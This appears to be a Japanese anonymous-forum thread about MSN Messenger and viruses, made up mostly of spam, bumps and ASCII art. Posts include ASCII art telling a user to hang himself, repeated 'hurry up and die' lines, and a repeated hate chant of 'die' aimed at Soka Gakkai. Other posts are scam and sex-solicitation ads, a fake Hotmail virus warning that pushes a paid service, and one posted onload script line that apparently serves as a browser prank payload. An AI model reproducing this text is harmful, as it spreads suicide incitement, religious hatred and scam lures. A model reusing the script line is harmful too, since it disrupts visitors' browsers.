何でも気軽に相談下さい。確実に貴方の悩みや困り事、トラブル等を迅速に解決致します。
i-mode・j-sky対応
http://www.black-893.com
★裏社会の会議室が只今、会議中！！！


☆女性事務スタッフ募集中！高収入確実！！！

＞＞騙された・捨てられた・弄ばれた・相手に誠意がない・
MSの事・？

さまざまな人がつかいますね

saGe

程よい沈み具合

>>187
・・・沈みすぎだろう。

　　　　　　　　 ／￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣￣＼
Λ＿Λ　　|　君さぁ　こんなスレッド立てるから　　　　　　　　 　|
（　´∀｀）＜　厨房って言われちゃうんだよ　　　　　　　　　 　 　|
（ ΛΛ つ ＞―――――――――――――――――――‐＜
　( ﾟДﾟ) ＜　おまえのことを必要としてる奴なんて　　 　　　　　 |
　/つつ　　|　いないんだからさっさと回線切って首吊れ　　　 　|
　　　　　　 ＼＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿＿_／

(-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ…
(∩∩) (∩∩) (∩∩)

(-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ…
(∩∩) (∩∩) (∩∩)

(-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ… (-＿-)　ﾊﾔｸｼﾝﾃﾞﾈ…
(∩∩) (∩∩) (∩∩)

（＾＾）

（＾＾）

　　 ∧＿∧
　　（　　＾＾ ）＜ ぬるぽ（＾＾）

　　　 　∧＿∧
ﾋﾟｭ.ｰ　(　　＾＾ ） ＜これからも僕を応援して下さいね（＾＾）。
　　＝〔~∪￣￣〕
　　＝ ◎――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉

　__∧＿∧_
　|（　　＾＾ ）|　＜寝るぽ（＾＾）
　|＼⌒⌒⌒＼
　＼ |⌒⌒⌒~|　　　　　　　　　山崎渉
　　 ~￣￣￣￣

　　　 　∧＿∧　 ∧＿∧
ﾋﾟｭ.ｰ　（　 ・３・） (　　＾＾ ） ＜これからも僕たちを応援して下さいね（＾＾）。
　　＝〔~∪￣￣￣∪￣￣〕
　　＝ ◎――――――◎ 　　　　　　　　　　　　　　　　　　　　　山崎渉&ぼるじょあ

　　　 (⌒V⌒)
　　　│ ＾ ＾ │＜これからも僕を応援して下さいね（＾＾）。
　　⊂|　　　　|つ
　　　（＿）（＿）　　　　　　　　　　　　　　　　　　　　　　山崎パン

このファイルはウイルスに感染しています。次のオプションから選択してください。
感染した添付ファイルからウイルスを駆除するため、MSN 有料サービスにサインアップする。 (推奨).
注意 : 駆除できないウイルスおよびその亜種が存在する可能性があります。
ウイルスに感染したファイルをダウンロードする。
感染したウイルスが原因でコンピュータが損傷を受けた場合、Hotmail では責任を負いかねます。

２ちゃんのカウンター崩壊！！
このスレのNo２６のカキコはどこへ逝ったっ！
http://kyusyu.machibbs.com/bbs/read.pl?BBS=kyusyu&KEY=1053838955&LAST=50

age

test

自動的にサインインにチェック入れてなかったのに勝手にサインインされるんですが・・。
自分しかさわれないPCなのに。。。

やばい、変なとこ押したら本体がすごい音出した

やばい、変なとこ押したら本体がすごい音出した

;-:=:=ー- 　　　　　 ー=;-;-;-;, , _　ヽヽ
　　　　　　,; ';";; ;;`-' '""　　　　　 　 ,;＝"ヽ_ ; ; ;:丶
　　　,,_　　!;_<"　　　　　　＿o从o＿　 ＋　　/; /　　,,.;- ,　））
((　(; ; ";''-ヽ 丶,,　+　／''''　　　 ''''' ＼　　+／／-;';";" ／
　 , -"'' -';;";;' ー:ニ;r'（●）,　　　､（●）ヽ／／,,-;''" ,,-"-=-,
　 ' -";;;"' -; ,二',-:（;;; ;;; ,,ﾉ(､_, )ヽ､,,ヽ;; ;）;" ',, - 二-- '' "_ノ
　　　,ー"';--;;,;;_,二| ;; ;; ｀-=ﾆ=- ';;);: ;;; ;| ""二"--,-二""
　　　 "'' '-;- ;;:;__ ,,,ヽ;;; ; ;:｀ﾆﾆ´:::; ;;; ;; ;丿'""二二;---"
　　　　　　ヾヽ,　,,- ="'--==,;;__;;,==--',' '''=二,,_,/i

今イギリスでBropiaの亜種が猛威を振るってる（MSN Messenger媒介感染）
　ﾆﾎﾟｰﾝ上陸はすぐだろうからもまいら用心汁

>>202
ｿﾚﾀﾞ! ｳｲﾙｽﾊｹｰﾝ!!! <Bropia亜種

まだまだ無料で使える部屋があります。
とりあえず　http://chat.msn.com/chatroom.msnw?rm=JudyGreenroom&pgmarket=en-ca
へどうぞ
詳しい説明をします。

ホシュ

セフレ募集です＞＜

保守

>>1
1 名前：名無しさん＠お腹いっぱい。[] 投稿日：01/09/19(水) 00:11
ニュー速板では、あきらかにウイルスだと言う人も
出てますが、どうなんでしょう？

関連スレ
MSNにウィルス添付？
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776

記念真紀子

今時、トップページに”ダンカン”なんて訳のわからない下賤なパーソナリティを定期的にアップし続けてるとか、あり得ないですｗ
今時、珍しいくらいに”意固地”で”偏向的”な感性の集まりって感じｗ

http://hiro248.kir.jp/
http://hiro248.kir.jp/kimyou1.html
http://hiro248.kir.jp/contents3.html
http://hiro248.kir.jp/pantu.html

エロ本ならここがおすすめ〜〜

　

ガチウイルス　開けます！！
かかってこいや〜自作もおｋ


http://com.nicovideo.jp/community/co6950?mypage_nicorepo
↑ニコニコ生放送URLだから

document.write("<body onload=window();>")

test

創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね
創,価
死,ね

★2ch勢いランキングサイトリスト★

☆ +ニュース
・ 2NN
・ 2chTimes
☆ +ニュース新着
・ 2NN新着
・ Headline BBY
・ Unker
☆ +ニュース他
・ Desktop2ch
・ 記者別一覧
☆ 全板
・ 全板縦断勢いランキング
・ スレッドランキング総合ランキング
☆ 実況込み
・ 2勢
・ READ2CH
・ i-ikioi

※ 要サイト名検索